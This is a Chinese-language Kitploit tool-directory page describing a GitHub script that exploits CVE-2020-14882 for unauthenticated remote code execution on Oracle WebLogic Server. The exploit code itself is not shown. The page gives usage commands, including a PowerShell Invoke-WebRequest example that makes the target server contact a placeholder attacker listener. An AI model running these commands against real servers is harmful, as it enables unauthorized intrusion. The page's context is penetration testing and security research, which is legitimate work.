Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-14882 — 此脚本允许在 Oracle WebLogic Server 上执行远程代码(RCE)。 | Kitploit
工具/GitHubGitHub/danny-lli/cve-2020-14882
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

此脚本允许在 Oracle WebLogic Server 上执行远程代码(RCE)。

查看仓库
213年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-14882

此脚本利用未经身份验证的GET请求在Oracle WebLogic Server上实现远程代码执行(RCE)。它利用了漏洞CVE-2020-14882。通过执行任意命令,攻击者可以未经授权地访问服务器。

漏洞利用详细信息

  • Exploit标题:Oracle WebLogic Server,通过GET请求实现未经身份验证的RCE
  • Exploit作者:Danny Safaya
  • CVE:CVE-2020-14882
  • 厂商主页:Oracle WebLogic Server
  • 软件链接:Oracle Middleware Downloads
  • 更多信息:WebLogic RCE by only one GET request (CVE-2020-14882) analysis

使用方法

确保已安装Python 3。要使用此脚本,请按照以下步骤操作:

  1. 打开终端或命令提示符。

  2. 使用以下命令运行脚本:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    将 http(s)://target:7001 替换为Oracle WebLogic Server的目标URL,并将 command 替换为要执行的命令。

    示例1:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
    

    此示例在目标服务器上执行命令 nslookup your_Domain。

    示例2:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
    

    此示例在目标服务器上执行PowerShell命令 Invoke-WebRequest -Uri http://your_listener。

警告

此脚本仅用于授权的渗透测试和安全研究目的。 未经授权使用此脚本在未获得适当同意的情况下利用系统是非法的,并可能导致法律后果。使用时请自负风险。

依赖项

此脚本需要以下依赖项:

  • requests
  • urllib3

请在运行脚本前确保已安装这些依赖项。


下载工具